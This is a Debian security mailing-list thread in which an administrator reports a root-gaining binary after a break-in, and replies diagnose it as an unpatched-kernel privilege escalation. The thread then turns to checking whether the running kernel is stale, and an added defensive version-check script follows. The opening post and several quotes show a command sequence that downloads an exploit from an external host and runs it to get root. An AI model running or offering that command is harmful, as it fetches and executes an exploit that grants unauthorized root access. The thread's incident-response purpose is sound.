rootkit not found by rkhunter

I am running debian testing, 2.6.30 kernel.

I have a rootkit installed on a bunch of machines that rkhunter
does not find. This appears after infection with SHV4 / SHV5,
which rkhunter found.

Here it works to allow a non-root user to become root

krichel@fricka:~$ mkdir a
krichel@fricka:~$ cd a
krichel@fricka:~/a$ ls -l
total 0
krichel@fricka:~/a$ wget webmail.facill.com.br/a
--2009-10-04 07:47:42--  http://webmail.facill.com.br/a
Resolving webmail.facill.com.br... 201.65.241.194
Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6886 (6.7K) [text/plain]
Saving to: `a'

100%[======================================>] 6,886       6.88K/s   in 1.0s

2009-10-04 07:47:44 (6.88 KB/s) - `a' saved [6886/6886]

krichel@fricka:~/a$ chmod 777 a
krichel@fricka:~/a$ ./a
root@fricka:~/a#

Here is a situation where it does not work

krichel@chichek:~$ mkdir a
krichel@chichek:~$ cd a
krichel@chichek:~/a$ wget webmail.facill.com.br/a
--2009-10-04 07:31:15--  http://webmail.facill.com.br/a
Resolving webmail.facill.com.br... 201.65.241.194
Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6886 (6.7K) [text/plain]
Saving to: `a'

100%[======================================>] 6,886       37.8K/s   in 0.2s

2009-10-04 07:31:16 (37.8 KB/s) - `a' saved [6886/6886]

krichel@chichek:~/a$ chmod 777 a
krichel@chichek:~/a$ ./a
mmap: Permission denied

Does anybody here know how to delete this kit?

Cheers,

Thomas Krichel                    http://openlib.org/home/krichel
                                  RePEc:per:1965-06-05:thomas_krichel
                                  skype: thomaskrichel

--
To UNSUBSCRIBE, email to debian-security-REQUEST@...
with a subject of "unsubscribe". Trouble? Contact listmaster@...

Re: rootkit not found by rkhunter

Thomas Krichel wrote:
> I am running debian testing, 2.6.30 kernel.
>
> I have a rootkit installed on a bunch of machines that rkhunter
> does not find. This appears after infection with SHV4 / SHV5,
> which rkhunter found.
>
> Here it works to allow a non-root user to become root
>
> krichel@fricka:~$ mkdir a
> krichel@fricka:~$ cd a
> krichel@fricka:~/a$ ls -l
> total 0
> krichel@fricka:~/a$ wget webmail.facill.com.br/a
> --2009-10-04 07:47:42--  http://webmail.facill.com.br/a
> Resolving webmail.facill.com.br... 201.65.241.194
> Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 6886 (6.7K) [text/plain]
> Saving to: `a'
>
> 100%[======================================>] 6,886       6.88K/s   in 1.0s
>
> 2009-10-04 07:47:44 (6.88 KB/s) - `a' saved [6886/6886]
>
> krichel@fricka:~/a$ chmod 777 a
> krichel@fricka:~/a$ ./a
> root@fricka:~/a#
>
> Here is a situation where it does not work
>
> krichel@chichek:~$ mkdir a
> krichel@chichek:~$ cd a
> krichel@chichek:~/a$ wget webmail.facill.com.br/a
> --2009-10-04 07:31:15--  http://webmail.facill.com.br/a
> Resolving webmail.facill.com.br... 201.65.241.194
> Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 6886 (6.7K) [text/plain]
> Saving to: `a'
>
> 100%[======================================>] 6,886       37.8K/s   in 0.2s
>
> 2009-10-04 07:31:16 (37.8 KB/s) - `a' saved [6886/6886]
>
> krichel@chichek:~/a$ chmod 777 a
> krichel@chichek:~/a$ ./a
> mmap: Permission denied
>
> Does anybody here know how to delete this kit?
>
> Cheers,
>
> Thomas Krichel                    http://openlib.org/home/krichel
>                                   RePEc:per:1965-06-05:thomas_krichel
>                                   skype: thomaskrichel

Don't understand the difference between both situations? ^^

Re: rootkit not found by rkhunter

On Sun, Oct 04, 2009 at 10:15:35AM -0400, Thomas Krichel wrote:
> I am running debian testing, 2.6.30 kernel.

This kernel lacks a few security fixes.

> I have a rootkit installed on a bunch of machines that rkhunter
> does not find. This appears after infection with SHV4 / SHV5,
> which rkhunter found.

Why do you think this is a rootkit?

Bastian

--
Leave bigotry in your quarters; there's no room for it on the bridge.
		-- Kirk, "Balance of Terror", stardate 1709.2

Re: rootkit not found by rkhunter

On Sun, 4 Oct 2009 10:15:35 -0400 Thomas Krichel wrote:
> krichel@fricka:~/a$ chmod 777 a
> krichel@fricka:~/a$ ./a
> root@fricka:~/a#
...
> krichel@chichek:~/a$ chmod 777 a
> krichel@chichek:~/a$ ./a
> mmap: Permission denied

this looks like a standard privilege escalation (not a rootkit). it
appears to be using one of the recent null pointer dereference kernel
vulnerabilities. your fricka machine is probably running one of the
unpatched kernels ('uname -r' will tell you which version you are
currently running). chichek is up to date since it is preventing
the dereferenced pointer from accessing mmap.

'apt-get update && apt-get upgrade' followed by a reboot into the new
kernel should bring you up to date.

mike

Re: rootkit not found by rkhunter

On Sun, 4 Oct 2009 10:15:35 -0400
Thomas Krichel <krichel@...> wrote:
> I am running debian testing, 2.6.30 kernel.
>
> I have a rootkit installed on a bunch of machines that rkhunter
> does not find. This appears after infection with SHV4 / SHV5,
> which rkhunter found.
>
> Here it works to allow a non-root user to become root
>
> krichel@fricka:~$ mkdir a
> krichel@fricka:~$ cd a
> krichel@fricka:~/a$ ls -l
> total 0
> krichel@fricka:~/a$ wget webmail.facill.com.br/a
> --2009-10-04 07:47:42--  http://webmail.facill.com.br/a
> Resolving webmail.facill.com.br... 201.65.241.194
> Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 6886 (6.7K) [text/plain]
> Saving to: `a'
>
> 100%[======================================>] 6,886       6.88K/s   in 1.0s
>
> 2009-10-04 07:47:44 (6.88 KB/s) - `a' saved [6886/6886]
>
> krichel@fricka:~/a$ chmod 777 a
> krichel@fricka:~/a$ ./a
> root@fricka:~/a#
>
> Here is a situation where it does not work
>
> krichel@chichek:~$ mkdir a
> krichel@chichek:~$ cd a
> krichel@chichek:~/a$ wget webmail.facill.com.br/a
> --2009-10-04 07:31:15--  http://webmail.facill.com.br/a
> Resolving webmail.facill.com.br... 201.65.241.194
> Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 6886 (6.7K) [text/plain]
> Saving to: `a'
>
> 100%[======================================>] 6,886       37.8K/s   in 0.2s
>
> 2009-10-04 07:31:16 (37.8 KB/s) - `a' saved [6886/6886]
>
> krichel@chichek:~/a$ chmod 777 a
> krichel@chichek:~/a$ ./a
> mmap: Permission denied
>
> Does anybody here know how to delete this kit?
>
> Cheers,
>
> Thomas Krichel                    http://openlib.org/home/krichel
>                                   RePEc:per:1965-06-05:thomas_krichel
>                                   skype: thomaskrichel

This file should at least be deleted from the host.

fgeek@foo:~$ file a
a: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped
fgeek@foo:~$ strings a
/lib/ld-linux.so.2
__gmon_start__
libc.so.6
_IO_stdin_used
socket
exit
execl
ftruncate
perror
sendfile
unlink
mkstemp
mmap
getpagesize
getgid
getuid
__libc_start_main
GLIBC_2.1
GLIBC_2.0
PTRh
([^_]
[^_]
mmap
socket
mkstemp
unlink
ftruncate
/bin/sh
/tmp/tmp.XXXXXX
fgeek@foo:~$ md5sum a
b950af01be61a8cbf5d479430738bd18  a
fgeek@foo:~$ sha1sum a
639536caea56554406106ad8679115971485f3a2  a

Re: rootkit not found by rkhunter

Michael S Gilbert writes
> this looks like a standard privilege escalation (not a rootkit). it
> appears to be using one of the recent null pointer dereference kernel
> vulnerabilities. your fricka machine is probably running one of the
> unpatched kernels ('uname -r' will tell you which version you are
> currently running). chichek is up to date since it is preventing
> the dereferenced pointer from accessing mmap.

Hmmmm, here is a list of machines affected and unaffected, with
their kernel version

affected
fricka    2.6.26-2-686
wotan     2.6.30-1-686
raneb     2.6.22-3-686
loge      2.6.26-2-686
trabbi    2.6.26-2-686
mutabor   2.6.26-2-686

not affected
khufu     2.6.30-1-686
chichek   2.6.30-1-686
nebka     2.6.26-2-686
sahure    2.6.30-1-amd64
snefru    2.6.30-1-686

On Tuesday I replaced all but /root /etc /var and /home on wotan,
which was the machine that has the SHV4/SHV5. It runs the latest
kernel. A cracker came in as a non-privileged user without deleting
his history, that's how I found out how he got root. I spotted the
break from root's deleted .bash_history and the user he got in as
from /var/log/auth.log.

It looks like the affected machines run older kernels, so
I will follow your advice and upgrade.

Thanks and cheers,

Thomas Krichel                    http://openlib.org/home/krichel
                                  RePEc:per:1965-06-05:thomas_krichel
                                  skype: thomaskrichel

Re: rootkit not found by rkhunter

Michael S Gilbert writes
> 'apt-get update && apt-get upgrade' followed by a reboot into the new
> kernel should bring you up to date.

Since I just downloaded the kernel last week I did not really
believe your advice but I have rebooted and the problem appears
gone!

Cheers,

Thomas Krichel                    http://openlib.org/home/krichel
                                  RePEc:per:1965-06-05:thomas_krichel
                                  skype: thomaskrichel

Re: rootkit not found by rkhunter

On Sun, Oct 04, 2009 at 11:44:52AM -0400, Thomas Krichel wrote:
> > this looks like a standard privilege escalation (not a rootkit). it
> > appears to be using one of the recent null pointer dereference kernel
> > vulnerabilities. your fricka machine is probably running one of the
> > unpatched kernels ('uname -r' will tell you which version you are
> > currently running). chichek is up to date since it is preventing
> > the dereferenced pointer from accessing mmap.
>
> Hmmmm, here is a list of machines affected and unaffected, with
> their kernel version
>
> affected
> fricka    2.6.26-2-686

The kernel version reported by uname is not enough to determine the
security status of the kernel. The kernel version number only changes
when the kernel ABI changes. Security updates are often applied
without ABI bumps. For example, kernel 2.6.26-2-686 was introduced by
linux 2.6.26-14. However, the current version is 2.6.26-19. Several
security fixes were introduced in the various releases between those two
versions, yet the version reported by uname was unchanged.

You need to make sure that the machine actually gets rebooted when
security updates are made.

AFAIK, the best way to know if you're running a stale kernel is to
compare the uptime of the machine against the mtime of the actual kernel
(using, e.g. "stat /boot/vmlinuz-2.6.26-2-686"). If the uptime of the
machine places the last reboot sometime before the kernel was updated,
you're not up to date. If there's a better way to test this, I'd love
to know about it.

noah

Re: rootkit not found by rkhunter

On Sun, 4 Oct 2009 12:10:04 -0400
Thomas Krichel <krichel@...> wrote:
> Michael S Gilbert writes
>
> > 'apt-get update && apt-get upgrade' followed by a reboot into the
> > new kernel should bring you up to date.
>
> Since I just download the kernel last week I did not really
> believe your advice but I have rebooted and the problem appears
> gone!
>
> Cheers,
>
> Thomas Krichel                    http://openlib.org/home/krichel
>                                   RePEc:per:1965-06-05:thomas_krichel
>                                   skype: thomaskrichel

You should use apticron and apt-dater.

---
Henri Salo

Re: rootkit not found by rkhunter

On Sun, 4 Oct 2009 11:44:52 -0400 Thomas Krichel wrote:
> It looks like the affected machines run older kernels, so
> I will follow your advice and upgrade.

i forgot to mention that 'uname -r' won't actually tell you whether you
are running the most up-to-date debian kernel. to do that, look at the
output of 'dpkg -l | grep linux-image-$(uname -r)'. you should have
2.6.30-8 or higher for sid and 2.6.26-19 or higher for lenny (not sure
where your 2.6.22 version came from, but i would recommend installing
an official kernel package instead of that one; otherwise you have no
security support at all).

mike

Re: rootkit not found by rkhunter

On Sun, 4 Oct 2009 12:10:04 -0400 Thomas Krichel wrote:
> Michael S Gilbert writes
>
> > 'apt-get update && apt-get upgrade' followed by a reboot into the new
> > kernel should bring you up to date.
>
> Since I just download the kernel last week I did not really
> believe your advice but I have rebooted and the problem appears
> gone!

right, kernel updates do not apply until after reboot. the latest
kernel images no longer warn about this, which has led to an increased
number of users opting not to reboot after upgrade (at least from the
volume of similar resolutions to postings on this list recently).

kernel team, would it be possible to get this warning reintroduced or
added to the notification daemon? we want to keep users informed about
the actions they need to take to stay secure, right?

mike

Re: rootkit not found by rkhunter

On 2009-10-04 19:10, Noah Meyerhans wrote:
> On Sun, Oct 04, 2009 at 11:44:52AM -0400, Thomas Krichel wrote:
>
>>> this looks like a standard privilege escalation (not a rootkit). it
>>> appears to be using one of the recent null pointer dereference kernel
>>> vulnerabilities. your fricka machine is probably running one of the
>>> unpatched kernels ('uname -r' will tell you which version you are
>>> currently running). chichek is up to date since it is preventing
>>> the dereferenced pointer from accessing mmap.
>>>
>> Hmmmm, here is a list of machines affected and unaffected, with
>> their kernel version
>>
>> affected
>> fricka    2.6.26-2-686
>>
> ...
>
> The kernel version reported by uname is not enough to determine the
> security status of the kernel. The kernel version number only changes
> when the kernel ABI changes. Security updates are often applied
> without ABI bumps. For example, kernel 2.6.26-2-686 was introduced by
> linux 2.6.26-14. However, the current version is 2.6.26-19. Several
> security fixes were introduced in the various releases between those two
> versions, yet the version reported by uname was unchanged.

Why is EXTRAVERSION not updated during the kernel package build?

Best regards,
--Edwin

Re: rootkit not found by rkhunter

On Sun, Oct 04, 2009 at 07:35:53PM +0300, Török Edwin wrote:
> Why is EXTRAVERSION not updated during the kernel package build?

EXTRAVERSION indicates the ABI version number. It's only updated when
that changes, in order to indicate that the new kernel is not compatible
with the old one and that external modules (e.g. the ati or nvidia
graphics drivers) need to be rebuilt.

noah

Re: rootkit not found by rkhunter

> AFAIK, the best way to know if you're running a stale kernel is to
> compare the uptime of the machine against the mtime of the actual kernel
> (using, e.g. "stat /boot/vmlinuz-2.6.26-2-686"). If the uptime of the
> machine places the last reboot sometime before the kernel was updated,
> you're not up to date. If there's a better way to test this, I'd love
> to know about it.

Comparing the outputs of:

    sed -n 's/[^(]*(Debian \([^)]*\)).*/\1/p' /proc/version

and:

    dpkg -s $(dpkg -S $(readlink /vmlinuz) | cut -d: -f1) |
        awk '/^Version: / {print $2}'

has worked well for me - thanks to the kernel team for including the
version and revision!

Mark.

Re: rootkit not found by rkhunter

* Noah Meyerhans:
> AFAIK, the best way to know if you're running a stale kernel is to
> compare the uptime of the machine against the mtime of the actual kernel
> (using, e.g. "stat /boot/vmlinuz-2.6.26-2-686"). If the uptime of the
> machine places the last reboot sometime before the kernel was updated,
> you're not up to date. If there's a better way to test this, I'd love
> to know about it.

What about /proc/version? If the version stored in it is incorrect, we
should really fix that.

Re: rootkit not found by rkhunter

On Sun, Oct 04, 2009 at 12:16:14PM -0400, Michael S Gilbert wrote:
> On Sun, 4 Oct 2009 11:44:52 -0400 Thomas Krichel wrote:
> > It looks like the affected machines run older kernels, so
> > I will follow your advice and upgrade.
>
> i forgot to mention that 'uname -r' won't actually tell you whether you
> are running the most up-to-date debian kernel. to do that, look at the
> output of 'dpkg -l | grep linux-image-$(uname -r)'.

cat /proc/version is nice because it is the running kernel, and
includes the package version.

> you should have
> 2.6.30-8 or higher for sid and 2.6.26-19 or higher for lenny (not sure
> where your 2.6.22 version came from, but i would recommend installing
> an official kernel package instead of that one; otherwise you have no
> security support at all).
>
> mike

--
dann frazier

running vs. installed kernel (was: rootkit not found by rkhunter)

On Mon, 05 Oct 2009, dann frazier wrote:
> On Sun, Oct 04, 2009 at 12:16:14PM -0400, Michael S Gilbert wrote:
> > On Sun, 4 Oct 2009 11:44:52 -0400 Thomas Krichel wrote:
> > > It looks like the affected machines run older kernels, so
> > > I will follow your advice and upgrade.
> >
> > i forgot to mention that 'uname -r' won't actually tell you whether you
> > are running the most up-to-date debian kernel. to do that, look at the
> > output of 'dpkg -l | grep linux-image-$(uname -r)'.
>
> cat /proc/version is nice because it is the running kernel, and
> includes the package version.

Also, maybe
http://git.debian.org/?p=mirror/dsa-nagios.git;a=blob;f=dsa-nagios-checks/checks/dsa-check-running-kernel;hb=HEAD
might be useful for some.

I don't claim it works in all the cases, or finds every weird
combination out there, but it seems to do a pretty good job of helping
us not forget to reboot systems.

I'm sure the interested parties can butcher it for parts if they don't
want all it does (i.e. maybe not everyone wants the get_avail magic).

Cheers,
weasel
--
                           |  .''`.  ** Debian GNU/Linux **
      Peter Palfrader      | : :' :      The  universal
 http://www.palfrader.org/ | `. `'      Operating System
                           |   `-    http://www.debian.org/

Re: rootkit not found by rkhunter

Hi,

Mark van Walraven <markv@...> wrote:
>> AFAIK, the best way to know if you're running a stale kernel is to
>> compare the uptime of the machine against the mtime of the actual kernel
>> (using, e.g. "stat /boot/vmlinuz-2.6.26-2-686"). If the uptime of the
>> machine places the last reboot sometime before the kernel was updated,
>> you're not up to date. If there's a better way to test this, I'd love
>> to know about it.
>
> Comparing the outputs of:
>
>     sed -n 's/[^(]*(Debian \([^)]*\)).*/\1/p' /proc/version
>
> and:
>
>     dpkg -s $(dpkg -S $(readlink /vmlinuz) | cut -d: -f1) |
>         awk '/^Version: / {print $2}'
>
> has worked well for me - thanks to the kernel team for including the
> version and revision!

Does someone know if rkhunter has such a check?

Bye, Jörg.
--
Our doubts are traitors, and often enough we forfeit the possible gain
because we do not dare the attempt.

Re: rootkit not found by rkhunter

Hello Noah,

Noah Meyerhans <frodo@...> wrote:
> You need to make sure that the machine actually gets rebooted when
> security updates are made.

I thought for security fixes in modules it's enough to update/replace
the module. Isn't it?

Bye, Jörg.
--
NetBSD is for women: it runs on washing machines

Re: running vs. installed kernel

Peter Palfrader wrote:
> On Mon, 05 Oct 2009, dann frazier wrote:
>
>> cat /proc/version is nice because it is the running kernel, and
>> includes the package version.
>>
>
> Also, maybe
> http://git.debian.org/?p=mirror/dsa-nagios.git;a=blob;f=dsa-nagios-checks/checks/dsa-check-running-kernel;hb=HEAD
> might be useful for some.

http://exchange.nagios.org/directory/Plugins/Uncategorized/Operating-Systems/Linux/Running-kernel-compared-to-installed-kernel-version-%252D-updated!/details

It deals with different versions of Debian and Ubuntu too.

By the way, on ubuntu systems this information is stored in
/proc/version_signature:

root@web1:~/bin# cat /proc/version
Linux version 2.6.28-15-server (buildd@yellow) (gcc version 4.3.3 (Ubuntu 4.3.3-5ubuntu4) ) #52-Ubuntu SMP Wed Sep 9 11:34:09 UTC 2009
root@web1:~/bin# cat /proc/version_signature
Ubuntu 2.6.28-15.52-server

Cheers,
Gunni

--
Guntram Trebs
freier Programmierer und Administrator
gt@...
+49 (30) 42 80 61 55
+49 (179) 519 82 39 (provisional)
+49 (151) 55 85 85 55
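An added example, not code from this thread and not the Debian or Ubuntu kernel teams' own tooling, that puts the checks discussed above into one script: Mark's comparison of the package version embedded in /proc/version against the version dpkg has installed, Noah's uptime-versus-image-mtime fallback for a kernel that carries no package version at all, and the Ubuntu /proc/version_signature form Gunni shows. The function names, the --live flag and the sample /proc/version, dpkg -s and version_signature strings are this example's own assumptions; the sample strings are constructed for the offline checks, not captured from any machine in the thread. One deliberate difference from the sed in the thread: the match is anchored to the start of the line, because a self-built kernel compiled with Debian's gcc also carries a "(Debian 4.1.2-25)" further along /proc/version, and the unanchored expression would report the compiler's package version as if it were the kernel's.

```shell
#!/bin/sh
# check-running-kernel.sh (added example, not from the thread or from Debian):
# is the kernel that is running the one the package manager installed?
# Parsers take their input as arguments so they can be exercised offline on
# constructed strings; only kernel_state_live touches the real system.

# Debian: /proc/version carries "(Debian X.Y.Z-N)" right after the release
# string. Anchoring on the first "(" keeps the gcc "(Debian ...)" later in the
# line from being picked up. Prints e.g. 2.6.26-19, or nothing for a kernel
# that was not built from the Debian package.
debian_running_version() {
    printf '%s\n' "$1" | sed -n 's/^[^(]*(Debian \([^)]*\)).*/\1/p'
}

# Ubuntu: /proc/version_signature reads "Ubuntu 2.6.28-15.52-server"; the
# package version is the part before the flavour suffix.
ubuntu_running_version() {
    printf '%s\n' "$1" | sed -n 's/^Ubuntu \([0-9.]*-[0-9.]*\)-.*/\1/p'
}

# "Version:" field from `dpkg -s linux-image-...` output passed as a string.
installed_version() {
    printf '%s\n' "$1" | awk '/^Version: / {print $2; exit}'
}

# ok / stale / unknown from the running and installed version strings.
kernel_state() {
    if [ -z "$1" ] || [ -z "$2" ]; then echo unknown
    elif [ "$1" = "$2" ]; then echo ok
    else echo stale
    fi
}

# Fallback when no package version is embedded (Noah's check): stale if the
# image on disk was written after the last boot.
# Args: boot time and image mtime, both as seconds since the epoch.
booted_before_install() {
    if [ "$1" -lt "$2" ]; then echo stale; else echo ok; fi
}

# Live check. /vmlinuz points at the newest installed image, so an ABI bump
# (a new linux-image package) also shows up as "stale"; the uname -r path is
# only a fallback when the symlink is missing.
kernel_state_live() {
    image="/boot/vmlinuz-$(uname -r)"
    [ -e /vmlinuz ] && image=$(readlink -f /vmlinuz)
    pkg=$(dpkg -S "$image" 2>/dev/null | cut -d: -f1)
    installed=$(installed_version "$(dpkg -s "$pkg" 2>/dev/null)")
    if [ -r /proc/version_signature ]; then
        running=$(ubuntu_running_version "$(cat /proc/version_signature)")
    else
        running=$(debian_running_version "$(cat /proc/version)")
    fi
    state=$(kernel_state "$running" "$installed")
    if [ "$state" = unknown ] && [ -f "$image" ]; then
        btime=$(awk '/^btime / {print $2}' /proc/stat)
        state=$(booted_before_install "$btime" "$(stat -c %Y "$image")")
    fi
    echo "running=${running:-?} installed=${installed:-?} state=$state"
    [ "$state" = ok ]
}

# Only touch the system when asked, so the file can be sourced for the
# offline parsers alone:  sh check-running-kernel.sh --live
case "${1:-}" in --live) kernel_state_live ;; esac
```

Run with --live on a Debian or Ubuntu box; the exit status is non-zero unless the running kernel matches the installed package, which makes it usable from cron or a monitoring check. Like every approach in the thread, this only tells you whether a reboot into the installed package is pending, not whether that package itself is current: for that you still need to compare the installed version against the thresholds Mike gave.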